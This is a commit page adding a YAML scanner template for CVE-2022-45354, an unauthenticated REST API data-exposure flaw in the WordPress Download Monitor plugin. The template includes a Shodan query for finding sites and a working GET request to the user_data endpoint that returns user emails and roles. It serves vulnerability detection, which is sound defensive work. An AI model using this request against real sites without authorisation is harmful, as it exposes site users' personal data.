Create CVE-2022-45354.yaml

patch-1
Dhiyaneshwaran 2023-07-12 01:24:50 +05:30 committed by GitHub
parent 55d7f7cb96
commit 5a2cd2b88a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 39 additions and 0 deletions

View File

@ -0,0 +1,39 @@
id: CVE-2022-45354
info:
name: Download Monitor <= 4.7.60 - Sensitive Information Exposure via REST API
author: DhiyaneshDK
severity: medium
description: |
The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords)
reference:
- https://github.com/RandomRobbieBF/CVE-2022-45354
- https://wordpress.org/plugins/download-monitor/
metadata:
verified: true
shodan-query: html:"/wp-content/plugins/download-monitor/"
max-request: 1
tags: cve,cve2023,wordpress,wp-plugin,download-monitor,wp
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/download-monitor/v1/user_data"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"registered":'
- '"display_name":'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200